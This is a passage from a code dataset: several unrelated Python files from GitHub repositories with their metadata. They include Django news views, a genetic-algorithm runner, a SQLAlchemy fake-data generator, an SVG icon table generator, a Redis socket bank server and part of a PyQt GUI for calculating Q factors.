\"\"\"0\nDXFENTITY\n5\nFFFF\n330\nABBA\n\"\"\"\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"tests/test_01_dxf_entities/test_101_dxfnamespace.py","file_name":"test_101_dxfnamespace.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20595112027","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib.auth.decorators import permission_required, login_required\nfrom django.core.mail import send_mail\n# Create your views here.\nfrom datetime import datetime\n\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView, DetailView, UpdateView, DeleteView, CreateView, TemplateView\nfrom .models import Post\nfrom .models import Category\nfrom pprint import pprint\nfrom .filters import PostFilter, ArticlesFilter\n\nfrom .forms import NewForm\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom .tasks import hello, send_mail_every_week, send_mail_post_save\nfrom django.views.decorators.cache import cache_page\nfrom django.core.cache import cache\n\nfrom django.utils.translation import gettext as _\n\n\nclass Index(View):\n def get(self, request):\n string = _('Hello word')\n\n return HttpResponse(string)\n\n\nclass CategoryList(LoginRequiredMixin, ListView):\n model = Category\n ordering = 'name'\n template_name = 'category.html'\n context_object_name = 'category'\n\n\n@login_required\ndef add_subscribe(request, pk):\n user = request.user\n selectedCat = Category.objects.get(pk=pk)\n selectedCat.subscribers.add(user)\n return render(request, 'subscribe.html', context={'user': user, 'selectedCat': selectedCat})\n\n\n# Все новости\nclass NewsList(LoginRequiredMixin, ListView):\n model = Post\n ordering = '-ti'\n template_name = 'news.html'\n context_object_name = 'posts'\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['time_now'] = datetime.utcnow()\n context['next_sale'] = None\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\n# Хочу отфильтровать только по статье, чтобы потом сделать навигацию. Без ввода пользователя\ndef articles_list(request):\n filter_categoryType = ArticlesFilter(request.GET, queryset=Post.objects.all())\n context = render(request, 'articles.html', {'filter': filter_categoryType})\n return context\n\n\nclass ArticlesListSearch(LoginRequiredMixin, ListView):\n model = Post\n ordering = '-ti'\n template_name = 'articles.html'\n context_object_name = 'articles'\n\n # Переопределяем функцию списка новостей\n def get_queryset(self):\n queryset = super().get_queryset()\n self.filterset = ArticlesFilter(self.request.GET, queryset)\n return self.filterset.qs\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['time_now'] = datetime.utcnow()\n context['filterset'] = self.filterset\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\n# Поиск с формой\nclass PostListSearch(LoginRequiredMixin, ListView):\n model = Post\n ordering = '-ti'\n template_name = 'newsSearch.html'\n context_object_name = 'posts'\n\n # Переопределяем функцию списка новостей\n def get_queryset(self):\n queryset = super().get_queryset()\n self.filterset = PostFilter(self.request.GET, queryset)\n return self.filterset.qs\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['time_now'] = datetime.utcnow()\n context['filterset'] = self.filterset\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\n# Одна новость\nclass NewsDetail(LoginRequiredMixin, DetailView):\n model = Post\n template_name = 'new.html'\n context_object_name = 'new'\n\n def get_object(self, *args, **kwargs): # переопределяем метод получения объекта, как ни странно\n obj = cache.get(f'post-{self.kwargs[\"pk\"]}',\n None) # кэш очень похож на словарь, и метод get действует так же. Он забирает значение по ключу, если его нет, то забирает None.\n\n # если объекта нет в кэше, то получаем его и записываем в кэш\n if not obj:\n obj = super().get_object(queryset=self.queryset)\n cache.set(f'post-{self.kwargs[\"pk\"]}', obj)\n\n return obj\n\n\n# Одна статья\nclass ArticleDetail(LoginRequiredMixin, DetailView):\n model = Post\n template_name = 'article.html'\n context_object_name = 'article'\n\n\n# Создать новость\n@permission_required('news.add_post')\ndef create_news(request):\n current_user = request.user\n if current_user.is_authenticated:\n form = NewForm()\n if request.method == 'POST':\n form = NewForm(request.POST)\n# date = datetime.strptime(request.POST['date'], '%Y-%m-%d')\n mail = current_user.email\n title = request.POST['title']\n text = request.POST['content']\n postCategory = request.POST['postCategory']\n cat = Category.objects.get(id=postCategory)\n users = cat.subscribers.all()\n if form.is_valid():\n categoryType = form.save(commit=False)\n categoryType.categoryType = 'NW'\n categoryType.save()\n '''\n if current_user in users:\n send_mail(\n subject=f'Hello, {current_user.username} . New article in your favorite section!».',\n message=f'{text[:50]} \\n'\n f' Ссылка http://127.0.0.1:8000/news/{categoryType.id}',\n\n from_email='marija.utochkina@yandex.ru',\n recipient_list=[mail],\n )\n '''\n send_mail_post_save.delay(categoryType.id)\n\n return HttpResponseRedirect('/news/')\n\n return render(request, 'new_edit.html', {'form': form})\n\n else:\n return HttpResponseRedirect('/news/')\n\n\n# Создать статью\n@permission_required('news.add_post')\ndef create_news1(request):\n current_user = request.user\n if current_user.is_authenticated:\n form = NewForm()\n if request.method == 'POST':\n form = NewForm(request.POST)\n# current_date = datetime.strptime(request.POST['date'], '%Y-%m-%d'),\n mail = current_user.email\n title = request.POST['title']\n text = request.POST['content']\n postCategory = request.POST['postCategory']\n cat = Category.objects.get(id=postCategory)\n users = cat.subscribers.all()\n\n if form.is_valid():\n categoryType = form.save(commit=False)\n categoryType.categoryType = 'AR'\n categoryType.save()\n if current_user in users:\n send_mail(\n subject=f'Hello, {current_user.username} . New article in your favorite section!».',\n message=f'{text[:50]}',\n from_email='marija.utochkina@yandex.ru',\n recipient_list=[mail],\n )\n return HttpResponseRedirect('/news/')\n\n return render(request, 'article_edit.html', {'form': form})\n else:\n return HttpResponseRedirect('/news/')\n\n\nclass NewUpdate(PermissionRequiredMixin, UpdateView):\n permission_required = ('news.change_post',)\n form_class = NewForm\n model = Post\n template_name = 'new_edit.html'\n\n\nclass NewDelete(PermissionRequiredMixin, DeleteView):\n permission_required = ('news.delete_post',)\n model = Post\n template_name = 'new_delete.html'\n success_url = reverse_lazy('news_list')\n\n\nclass ArticleUpdate(PermissionRequiredMixin, UpdateView):\n permission_required = ('news.change_post',)\n form_class = NewForm\n model = Post\n template_name = 'article_edit.html'\n\n\nclass ArticleDelete(PermissionRequiredMixin, DeleteView):\n permission_required = ('news.delete_post')\n model = Post\n template_name = 'article_delete.html'\n success_url = reverse_lazy('articles_list')\n\n\nclass UserTemplate(LoginRequiredMixin, TemplateView):\n template_name = 'flatpages/default.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\nclass IndexView(View):\n def get(self, request):\n # printer.apply_async([10], countdown=10)\n # hello.delay()\n send_mail_every_week.delay()\n return HttpResponse('Hello!')\n\n\n\n","repo_name":"MariyaGudilina/DjangoProjects","sub_path":"projectNews/NewsPaper/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39065216926","text":"from bisection import Bisection\nimport argparse\nimport numpy as np \n\ndef option():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-t\", \"--times\", type = int,default=10,\n help=\"run_multiple_times in 1 Bisection\")\n\n ap.add_argument(\"-m\", \"--mssv\", type = int, required=True, help=\"MSSV\")\n\n ap.add_argument(\"-p\", \"--problem\",type=str, required=True, help=\"Type Problem\")\n\n ap.add_argument(\"-c\", \"--crossover\",type=str, required=True,help=\"Type cross_over\") \n\n ap.add_argument(\"-n\", \"--tournament\", type = int, default=4, help=\"Tournament Size\")\n args = vars(ap.parse_args())\n return args\n\ndef run_Bisections(times_bisections, times, seed, type_problem, type_crossover, problem_size,tournament_size):\n evals = []\n MRPS = []\n \n for i in range(times_bisections):\n \n print(\"RUN BISECTION WITH RANDOM_SEED: == {}.format(seed)\")\n \n bi = Bisection(times, seed, type_problem, type_crossover, problem_size,tournament_size)\n \n e, m, success = bi.run()\n \n path_file_eval = \"Data/Eval/\" + type_problem + \"_\" + type_crossover + \"_\" + str(problem_size) + \".txt\"\n path_file_mrps = \"Data/MRPS/\" + type_problem + \"_\" + type_crossover + \"_\" + str(problem_size) + \".txt\"\n \n with open( path_file_eval, 'a') as f:\n f.write(str(e) + \" \")\n\n with open( path_file_mrps, 'a') as f:\n f.write(str(m) + \" \")\n \n if success:\n evals.append(e)\n MRPS.append(m)\n seed += 10\n\n return evals, MRPS, True\n\ndef main():\n args = option()\n problems_size = [10,20,40,80,160]\n\n times_bisections = 10\n\n for i in problems_size:\n print(\"BEGIN EXPERIMENT : Type Problem _ {} , Type Cross_over _ {}, Problem_size _ {}\".\n format(args[\"problem\"], args[\"crossover\"], i))\n\n evals, MRPS, success = run_Bisections(times_bisections, args[\"times\"], args[\"mssv\"], \n args[\"problem\"], args[\"crossover\"], i, args[\"tournament\"])\n\n print(\"evals: ={}\".format(evals))\n eval_std = np.std(evals)\n print(\"----> avg evals: {} with std of {}\".format(np.mean(evals),eval_std))\n\n print(\"MRPS: = {}\".format(MRPS))\n mrps_std = np.std(MRPS)\n print(\"----> avg MRPS: {} with std of {}\".format(np.mean(MRPS),mrps_std))\n\nif __name__ == \"__main__\":\n main()","repo_name":"PhamLeQuangNhat/Genetic_Algorithm_Learning_Projects","sub_path":"Onemax/run_main.py","file_name":"run_main.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17970866433","text":"import os\nimport os.path\nfrom .JuliaErrorVisualizer import JuliaErrorVisualizer\n\n\nclass JuliaOutputChecker:\n\n def __init__(self, dr):\n self.work_directory = dr\n self.file_starts_string = \"Result_\"\n self.file_ends_string = \".csv\"\n self.h8760 = 8760\n self.report = {}\n self.REPORT_ERROR_NOT_FLOAT = \"CAN'T_CONVERT_TO_FLOAT\"\n self.REPORT_ERROR_NOT_A_NUMBER = \"CONTENT IS Nan\"\n\n def check(self):\n if not os.path.isdir(self.work_directory):\n return\n for f in os.listdir(self.work_directory):\n file = os.path.join(self.work_directory, f)\n if os.path.isfile(file):\n if str(f).startswith(self.file_starts_string) and str(f).endswith(self.file_ends_string):\n with open(file, \"r\") as fr:\n for i in range(self.h8760):\n line = fr.readline()\n try:\n line = float(line)\n except:\n self.add_to_report(f, self.REPORT_ERROR_NOT_FLOAT)\n break\n if not line == line:\n self.add_to_report(f, self.REPORT_ERROR_NOT_A_NUMBER)\n break\n\n def visualize(self):\n julia_error_visualizer = JuliaErrorVisualizer(self.report)\n julia_error_visualizer.visualize()\n\n def add_to_report(self, file, error):\n self.report[str(file)] = error\n\n def clear_report(self):\n self.report = {}\n\n def get_report(self):\n return self.report\n\n def set_folder(self, folder):\n self.work_directory = folder\n\n\n\n","repo_name":"Planheat/Planheat-Tool","sub_path":"planning_and_simulation_modules/Tjulia/checks/JuliaOutputChecker.py","file_name":"JuliaOutputChecker.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3201316480","text":"import sqlalchemy as db\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom mimesis import Generic\r\nimport argparse\r\nimport logging\r\nfrom os import path\r\nimport random\r\n\r\nlogging.basicConfig(\r\n level=logging.INFO,\r\n format=\"{asctime} {levelname} {message}\",\r\n style='{'\r\n)\r\n\r\nBase = declarative_base()\r\n\r\nclass People(Base):\r\n \"\"\"\r\n A model that describes a people with the following variables:\r\n id, full_name, nationality, age, job, phone, email.\r\n \r\n \"\"\"\r\n __tablename__ = \"people\"\r\n\r\n id = db.Column(\"id\", db.Integer, primary_key=True)\r\n full_name = db.Column(\"fullname\", db.String)\r\n age = db.Column(\"age\", db.Integer)\r\n job = db.Column(\"job\", db.String)\r\n phone = db.Column(\"phone\", db.String)\r\n email = db.Column(\"email\", db.String)\r\n nationality = db.Column(\"nationality\", db.String)\r\n country = db.Column(\"country\", db.String)\r\n city = db.Column(\"city\", db.String)\r\n street = db.Column(\"street\", db.String)\r\n house = db.Column(\"house\", db.Integer)\r\n zip_code = db.Column(\"zip_code\", db.Integer)\r\n\r\n def __init__(self, **kwargs):\r\n super(People, self).__init__(**kwargs)\r\n\r\n def bootstrap(count, locale: str):\r\n \"\"\"A function that generates random values for the people model and \r\n automatically comments them to the database.\r\n\r\n Args:\r\n count (int): The amount of data to generate\r\n locale (str): Local data to be used for generation\r\n \"\"\"\r\n \r\n maxGen = 5000 #limiting the maximum number of data generations\r\n \r\n if 0 <= count <= maxGen:\r\n generic = Generic(locale)\r\n \r\n for _ in range(count):\r\n people = People(\r\n full_name = generic.person.full_name(),\r\n nationality = generic.person.nationality(),\r\n age = generic.person.age(minimum=16, maximum=100),\r\n job = generic.person.occupation(),\r\n phone = generic.person.telephone(),\r\n email = generic.person.email(),\r\n country = generic.address.country(),\r\n city = generic.address.city(),\r\n street = generic.address.street_name(),\r\n house = generic.address.street_number(maximum=400),\r\n zip_code = generic.address.zip_code()\r\n )\r\n session.add(people)\r\n session.commit()\r\n else: logging.error(\"The number of instances of model 'People' is not in the range: 0 : 5000\") \r\n \r\n def count_people():\r\n \"\"\"A function that generates a random id of a person who is in the database\r\n\r\n Returns:\r\n int: Returns a random id\r\n \"\"\"\r\n list = []\r\n for val in session.query(People.id).distinct():\r\n list.append(val[0])\r\n \r\n values = list[random.randint(0, len(list)-1)]\r\n return values\r\n\r\n\r\nclass Card(Base):\r\n \"\"\"\r\n A model that describes someone's credit card with the following variables:\r\n id, number, data, cvv, validity, owner.\r\n\r\n \"\"\"\r\n __tablename__ = \"card\"\r\n\r\n id = db.Column(\"id\", db.Integer, primary_key=True)\r\n number = db.Column(\"number\", db.Integer)\r\n date = db.Column(\"date\", db.String)\r\n cvv = db.Column(\"cvv\", db.String)\r\n creation_date = db.Column(\"creation_date\", db.String)\r\n owner_id = db.Column(\"owner\", db.Integer, db.ForeignKey(\"people.id\"))\r\n\r\n def __init__(self, **kwargs):\r\n super(Card, self).__init__(**kwargs)\r\n\r\n def bootstrap(count, locale: str):\r\n \"\"\"A function that generates random values for the card model and \r\n automatically comments them to the database.\r\n\r\n Args:\r\n count (int): The amount of data to generate\r\n locale (str): Local data to be used for generation\r\n \"\"\"\r\n \r\n maxGen = 5000 #limiting the maximum number of data generations\r\n \r\n if 0 <= count <= maxGen:\r\n generic = Generic(locale)\r\n \r\n for _ in range(count):\r\n card = Card(\r\n number = generic.payment.credit_card_number(),\r\n date = generic.payment.credit_card_expiration_date(minimum=23, maximum=28),\r\n cvv = generic.payment.cvv(),\r\n creation_date = generic.datetime.date(start=2018, end=2023),\r\n owner_id = People.count_people()\r\n ) \r\n session.add(card)\r\n session.commit()\r\n else: logging.error(\"The number of instances of model 'Card' is not in the range: 0 : 5000\")\r\n\r\ndef delete(val):\r\n \"\"\"The function that is used to delete a person and his card.\r\n\r\n Args:\r\n val (int): ID of the person and cardholder to delete\r\n \"\"\"\r\n session.query(People).filter(People.id == val).delete()\r\n session.query(Card).filter(Card.owner_id == val).delete()\r\n session.commit()\r\n\r\ndef pars():\r\n \"\"\"A script generation method that generates the amount of data that the \r\n user enters through the console. Also checks if more addresses than people \r\n have been created.\r\n\r\n \"\"\"\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\"it_people\", type=int, help=\"Number of iterations for model 'People'\")\r\n parser.add_argument(\"it_card\", type=int, help=\"Number of iterations for model 'Card'\")\r\n # parser.add_argument(\"it_delete\", type=int, help=\"ID of the person and cardholder to delete\")\r\n\r\n args = parser.parse_args()\r\n\r\n People.bootstrap(args.it_people,\"en\")\r\n Card.bootstrap(args.it_card,\"en\")\r\n\r\n # delete(args.it_delete)\r\n\r\nif __name__ == \"__main__\":\r\n if not path.exists(\"sqlite:///base.db\"): \r\n engine = db.create_engine(\"sqlite:///base.db\", echo=False)\r\n Base.metadata.create_all(bind=engine)\r\n\r\n Session = sessionmaker(bind=engine)\r\n session = Session()\r\n logging.info(\"The database has been updated!\")\r\n\r\n pars()\r\n","repo_name":"Yammili/Model-with-fake-data","sub_path":"bank_sql_mimesis.py","file_name":"bank_sql_mimesis.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42830450325","text":"import os\nimport argparse\nfrom string import Template\n\n\nprefix_cover = 'icon-cover'\nprefix_small = 'icon-s'\nprefix_medium = 'icon-m'\nprefix_large = 'icon-l'\n\nfile_format = '.svg'\n\n\ndef parse_arguments():\n \"\"\"\n Parse arguments from command line\n :return: argparse.Namespace\n \"\"\"\n get_cwd = os.getcwd()\n\n parser = argparse.ArgumentParser(description='Create html page with tables')\n parser.add_argument('-i', '--icons_dir', type=str, default='icons',\n help='Path to directory with icons')\n parser.add_argument('-t', '--template', type=str, default=os.path.join(get_cwd, 'template.html'),\n help='Path to HTML template file')\n parser.add_argument('-o', '--output', type=str, default=os.path.join(get_cwd, 'rendered.html'),\n help='Path to output HTML file')\n parser.add_argument('--cover', action='store_true', dest='generate_cover',\n help='Generate table with icons with prefix \"{}\"'.format(prefix_cover))\n parser.add_argument('--small', action='store_true', dest='generate_small',\n help='Generate table with icons with prefix \"{}\"'.format(prefix_small))\n parser.add_argument('--medium', action='store_true', dest='generate_medium',\n help='Generate table with icons with prefix \"{}\"'.format(prefix_medium))\n parser.add_argument('--large', action='store_true', dest='generate_large',\n help='Generate table with icons with prefix \"{}\"'.format(prefix_large))\n\n return parser.parse_args()\n\n\ndef create_table_with_files(file_paths, indent=0, img_class=None, columns=1):\n \"\"\"\n Creates a simple table with indent and columns with 2 cells:\n first cell - name of the file\n second cell - img tag with class img_class\n :param file_paths: list\n :param indent: int\n :param img_class: str\n :param columns: int\n :return: str\n \"\"\"\n table_tag = '\\n{}' + ' ' * indent + '
        '\n row_tag = ' ' * indent + ' {}\\n'\n cell_tag = '{}'\n if img_class:\n img_tag = ''\n else:\n img_tag = ''\n\n counter_columns = 0\n rows = ''\n cells = ''\n for file_path in file_paths:\n filename = os.path.basename(file_path)\n\n name_cell = cell_tag.format(filename.strip(file_format))\n\n img_cell = img_tag.format(file_path)\n image_cell = cell_tag.format(img_cell)\n\n cells += image_cell + name_cell\n\n counter_columns += 1\n\n if counter_columns >= columns:\n rows += row_tag.format(cells)\n counter_columns = 0\n cells = ''\n\n return table_tag.format(rows)\n\n\ndef count_indent(text, template):\n \"\"\"\n Count indent before template in the text and returns count of spaces\n :param text: str\n :param template: str\n :return: int\n \"\"\"\n template_index = text.find(template)\n indent = 0\n while text[template_index - 1 - indent] == ' ':\n indent += 1\n\n return indent\n\n\nif __name__ == '__main__':\n arguments = parse_arguments()\n\n with open(arguments.template, 'r') as f:\n html_template = f.read()\n\n # Default - if no one argument of prefix is set, all prefixes will be shown in the table,\n # otherwise - only prefix that is set will be shown in the table\n if (arguments.generate_cover or arguments.generate_small or\n arguments.generate_medium or arguments.generate_large) is False:\n arguments.generate_cover = arguments.generate_small = True\n arguments.generate_medium = arguments.generate_large = True\n\n listdir = os.listdir(arguments.icons_dir)\n svg_files = [item for item in listdir if item.endswith(file_format)]\n\n if arguments.generate_cover:\n svg_files_cover = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_cover)]\n cover_indent = count_indent(html_template, '$cover_table')\n table_cover = create_table_with_files(svg_files_cover, indent=cover_indent, img_class='cover', columns=4)\n html_template = Template(html_template).safe_substitute(cover_table=table_cover)\n\n if arguments.generate_small:\n svg_files_small = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_small)]\n small_indent = count_indent(html_template, '$small_table')\n table_small = create_table_with_files(svg_files_small, indent=small_indent, img_class='small', columns=3)\n html_template = Template(html_template).safe_substitute(small_table=table_small)\n\n if arguments.generate_medium:\n svg_files_medium = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_medium)]\n medium_indent = count_indent(html_template, '$medium_table')\n table_medium = create_table_with_files(svg_files_medium, indent=medium_indent, img_class='medium', columns=2)\n html_template = Template(html_template).safe_substitute(medium_table=table_medium)\n\n if arguments.generate_large:\n svg_files_large = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_large)]\n large_indent = count_indent(html_template, '$large_table')\n table_large = create_table_with_files(svg_files_large, indent=large_indent, img_class='large', columns=2)\n html_template = Template(html_template).safe_substitute(large_table=table_large)\n\n with open(arguments.output, 'w') as f:\n f.write(html_template)\n","repo_name":"SupFear/insert_tables","sub_path":"insert_tables.py","file_name":"insert_tables.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44650141168","text":"import socket,redis,json\nfrom redlock import RedLock\ndef report_json(accounts):\n\treport = {}\n\tfor account in accounts:\n\t\treport[account] = int(r.get(account))\n\treturn json.dumps(report)\ndef init_process(command):\n\tcommand[1] = command[1].lower()\n\tif r.exists(command[1]) == True :\n\t\treturn 'error'\n\tmoney = int(command[2])\n\tif \tmoney<0:\n\t\treturn 'error'\n\tr.set(command[1],money)\n\treturn report_json([command[1],])\ndef save_process(command):\n\tcommand[1] = command[1].lower()\n\tif r.exists(command[1]) == False :\n\t\treturn 'error'\n\tmoney = int(command[2])\n\tif \tmoney<0:\n\t\treturn 'error'\n\tr.incr(command[1],money)\n\treturn report_json([command[1],])\ndef load_process(command):\n\tcommand[1] = command[1].lower()\n\tif r.exists(command[1]) == False :\n\t\treturn 'error'\n\tmoney = int(command[2])\n\ttotal = int(r.get(command[1]))\n\tif \tmoney<0 or money>total:\n\t\treturn 'error'\n\tr.decr(command[1],money)\n\treturn report_json([command[1],])\ndef remit_process(command):\n\tcommand[1] = command[1].lower()\n\tcommand[2] = command[2].lower()\n\tif command[1] == command[2] or r.exists(command[1])== False or r.exists(command[2]) == False :\n\t\treturn 'error'\n\tmoney = int(command[3])\n\ttotal = int(r.get(command[1]))\n\tif \tmoney<0 or money>total:\n\t\treturn 'error'\n\tr.decr(command[1],money)\n\tr.incr(command[2],money)\n\treturn report_json([command[1],command[2]])\ndef end_process():\n\tr.flushdb()\n\treturn 'over'\ndef process_command(command):\n\tcommand = command.decode('utf-8').split(' ')\n\ttype = \tcommand[0]\n\tif type == 'init':\n\t\treturn init_process(command)\n\telif type == 'save':\n\t\treturn save_process(command)\n\telif type == 'load':\n\t\treturn load_process(command)\n\telif type == 'remit':\n\t\treturn remit_process(command)\n\telse:\n\t\treturn end_process()\n\n\t\t\n\t\t\n\nlock = RedLock(\"distributed_lock\", \nconnection_details=[{'host': '192.168.111.128', 'port': 6379, 'db': 0},]\n)\nr = redis.Redis(host='192.168.111.128',port=6379,db=0)\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind(('0.0.0.0',8888))\ns.listen(1)\nwhile(1):\n\tc,ip = s.accept()\n\tprint(ip)\n\twhile 1:\t\n\t\tcommand = c.recv(1024);\n\t\tif command:\n\t\t\tlock.acquire()\n\t\t\tret = process_command(command).encode('utf-8')\n\t\t\tc.sendall(ret)\n\t\t\tlock.release()\n\t\telse:\n\t\t\tbreak;\n","repo_name":"st424204/OS-HW","sub_path":"HW-4/code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"424141688","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QFrame, QApplication, QPushButton, QRadioButton, QLabel, QComboBox, QLineEdit, QFileDialog, QMessageBox\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QGridLayout\nfrom matplotlib.figure import Figure\nfrom calculateQ import baseQ\nfrom draggable import PlotCanvas\nfrom graph import Graph\nfrom process import readlvm\nimport csv\nimport os\n\n\nclass MainWindow(QFrame):\n canvas = None\n\n def __init__(self, parent=None):\n super(MainWindow, self).__init__()\n\n self.setWindowTitle(\"Q\") \n self.setObjectName('Main')\n self.setStyleSheet(open(\"QSS/mainwindow.qss\", \"r\").read())\n self.resize(900, 600)\n \n self.parent = parent\n\n self.setButtons()\n self.setLabels()\n self.setLayouts()\n\n def setButtons(self):\n ''' Set all buttons here. '''\n self.Load = QPushButton(self) # PushButton 'Load'\n #self.Load.setText(u\"Open\")\n #self.Load.setFixedWidth(90)\n self.Load.setIcon(QIcon('./resource/icons8-open-100.png')) \n self.Load.setIconSize(QtCore.QSize(30,30)) \n self.Load.setToolTip('Open the base file')\n self.Load.clicked.connect(self.openQ)\n\n self.Run = QPushButton(self) # PushButton 'Run'\n # self.Run.setText(u\"Load\")\n # self.Run.setFixedWidth(90)\n self.Run.setIcon(QIcon('./resource/icons8-start-100.png'))\n self.Run.setIconSize(QtCore.QSize(30,30)) \n self.Run.setToolTip('Start calculating')\n self.Run.clicked.connect(self.process)\n\n self.Fit = QPushButton(self) # PushButton 'Run'\n # self.Fit.setText(u\"Fit\")\n # self.Fit.setFixedWidth(90)\n self.Fit.setIcon(QIcon('./resource/icons8-line-chart-100.png'))\n self.Fit.setIconSize(QtCore.QSize(30,30)) \n self.Fit.setToolTip('Fitting selected points')\n self.Fit.clicked.connect(self.fit)\n\n self.Export = QPushButton(self)\n # self.Export.setText(u\"Export\")\n # self.Export.setFixedWidth(90)\n self.Export.setIcon(QIcon('./resource/icons8-export-csv-100.png'))\n self.Export.setIconSize(QtCore.QSize(30,30)) \n self.Export.setToolTip('Export data as csv file')\n self.Export.clicked.connect(self.export)\n\n self.Reset = QPushButton(self)\n # self.Reset.setText(u\"Reset\")\n # self.Reset.setFixedWidth(90)\n self.Reset.setIcon(QIcon('./resource/icons8-synchronize-100.png'))\n self.Reset.setIconSize(QtCore.QSize(30,30)) \n self.Reset.setToolTip('Reset all')\n self.Reset.clicked.connect(self.reset)\n\n self.Unfit = QPushButton(self) # PushButton 'Run'\n # self.Unfit.setText(u\"Unfit\")\n # self.Unfit.setFixedWidth(90)\n self.Unfit.setIcon(QIcon('./resource/icons8-undo-100.png'))\n self.Unfit.setIconSize(QtCore.QSize(30,30)) \n self.Unfit.setToolTip('Cancel Fitting')\n self.Unfit.clicked.connect(self.unfit)\n\n self.b1 = QRadioButton(\"1 Peak\")\n self.b1.setChecked(True)\n self.b2 = QRadioButton(\"2 Peaks\")\n \n def setLabels(self):\n ''' Set all labels here. '''\n self.modulation = QLabel(self)\n self.modulation.setText(\"Modulation Coefficient:\")\n self.comboBox = QComboBox(self)\n self.comboBox.setObjectName(\"comboBox\")\n self.comboBox.addItem(\"0.025 (633)\")\n self.comboBox.addItem(\"0.036 (633)\")\n self.comboBox.addItem(\"0.0083 (633)\")\n self.comboBox.addItem(\"0.038 (765)\")\n self.comboBox.addItem(\"0.033 (765)\")\n self.comboBox.addItem(\"0.049 (980)\")\n self.comboBox.addItem(\"0.036 (980)\")\n self.comboBox.addItem(\"0.043 (1064)\")\n self.comboBox.addItem(\"0.089 (1330)\")\n self.comboBox.addItem(\"0.052 (1550)\")\n\n self.lambda_tag = QLabel(self)\n self.lambda_tag.setText(\"Starting lambda:\")\n self.slambda = QLineEdit()\n # self.slope.setValidator(QIntValidator())\n self.slambda.setText(\"1572.42\")\n self.slambda.setAlignment(Qt.AlignRight)\n\n self.slope_tag = QLabel(self)\n self.slope_tag.setText(\"Slope:\")\n self.slope = QLineEdit()\n # self.slope.setValidator(QIntValidator())\n self.slope.setText(\"396.5\")\n self.slope.setAlignment(Qt.AlignRight)\n \n self.result = QLabel(self) # Label 'Output_image'\n self.result.setObjectName(\"OutputImg\")\n # self.result.setFixedHeight(25) \n # self.result.setFixedWidth(300) \n\n def setLayouts(self):\n ''' Set layout here. '''\n self.mainLayout = QVBoxLayout()\n self.resultLayout = QHBoxLayout()\n self.drawLayout = QHBoxLayout()\n self.graphLayout = QGridLayout()\n self.functionLayout = QHBoxLayout()\n\n self.functionLayout.addWidget(self.modulation, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.comboBox, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.lambda_tag, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.slambda, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.slope_tag, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.slope, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.b1)\n self.functionLayout.addWidget(self.b2)\n\n\n self.resultLayout.addWidget(self.result, 0, Qt.AlignCenter)\n\n self.graph = Graph()\n self.canvas = PlotCanvas(self)\n self.graphLayout.addWidget(self.graph, 0, Qt.AlignCenter)\n self.drawLayout.addWidget(self.canvas)\n \n # Button layout\n self.functionLayout.addWidget(self.Load, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Run, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Fit, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Unfit, 0, Qt.AlignCenter)\n \n\n\n # Result layout\n self.functionLayout.addWidget(self.Export, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Reset, 0, Qt.AlignCenter)\n \n\n self.mainLayout.addLayout(self.graphLayout)\n self.mainLayout.addLayout(self.resultLayout)\n 